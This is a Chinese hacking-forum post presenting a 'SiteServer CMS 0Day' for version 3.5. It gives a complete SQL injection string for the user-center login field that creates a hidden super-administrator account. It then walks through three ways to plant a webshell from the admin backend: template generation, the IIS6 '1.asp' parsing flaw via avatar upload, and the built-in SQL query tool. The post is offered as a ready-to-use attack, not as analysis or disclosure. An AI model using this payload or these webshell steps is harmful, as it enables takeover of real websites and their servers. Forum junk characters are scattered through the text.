找回密码
 立即注册
查看: 2870|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
& [" _) s( O  n8 s, ]# e4 Y  y& S+ [3 y
stieserver官网:www.siteserver.cn
: _" Z8 ]5 o# p3 u# y; e( D5 d1 s
5 y& U- @0 ~% d) @" v
- H: E5 d3 d% u5 u
  Z4 S0 ^0 Z$ v+ @/ G% w' O8 IEXP:; T$ @* T) D  B

' l# |* m  q) H% F( {7 [! ~1 z直接访问UserCenter/login.aspx
1 D9 l, e4 f& Z& {: x/ `0 |, n

; O) M# ?) Z3 U. O, a. w& c- @8 r0 i8 j; r: V
用户名处输入:% z5 v- A3 o$ ^

2 t4 A' A) ?6 K( d123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
% @. t5 L% G% [% s8 h2 G  ^; G8 g6 ], ~

( `) ?5 A. }; w7 K! |3 W8 K* C. T) m! w
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
3 A/ w5 z3 y2 F9 i  d. ]$ l5 V+ {
8 C3 j# p+ ~% S) s" r- U8 R$ N3 x " G' U0 p2 M7 F; Q! n% ?% r, b
, [; T- v, Y$ ~; t2 Y6 Z# f, J- `
之后再访问后台SiteServer/login.aspx用插入的用户登陆' N8 q- |) a% g: y0 O7 P

" ^7 I# K$ e3 q8 O' w! r( Y( C* H
2 D8 E7 I/ v0 g& Z  ]: f' E  p/ d. x8 n7 r
后台拿webshell的三种方法:) y% K. j+ `7 P8 r

- W5 \% p5 e- P: ~. R5 W一、8 i% V1 _& r2 p& u
' Y0 U1 \  D, W: K2 U! O$ {
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
. I- X7 w6 H. }3 G" C. d
. r& g; U; H* K8 R$ r" E二、
( G  [: v( R- O2 V
. m# x  A7 u# e* W  T( z% k/ d成员权限-》添加用户-》用户名为:1.asp
. A7 O; T% w$ p2 f9 P6 S1 q( U+ B% {- N; c) B
http://127.0.0.1/usercenter/4 |; m* k" S3 @. I% S6 a: C" S
9 E; p7 r+ q2 Q( ]+ I& ?. \8 i
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell& w; H0 W5 s% f! s. i) u( e
# A' R( k) v' _5 K" M1 q4 a
(ps:后台添加用户时不会验证是否含有非法字符)4 t# M5 z  j8 P& ?

; S, r0 z. O* g- ^' o三、
; G+ C; j# B! ^. {9 c' E) q' @2 ]
系统工具-》实用工具-》机器参数查看5 P( ^& G# l$ x% l0 ?8 w; T
可以看到数据库类型、名称,WEB路径' n5 b; i0 M7 x1 a5 M

1 j9 C: D/ b3 G5 s, Q) E' O* u" I系统工具-》数据库工具-》SQL语句查询5 W3 x8 m6 |9 ^- k8 f
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。$ v% A0 e" t, ^: ^
3 f! R9 y" ^7 {2 i3 y* x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表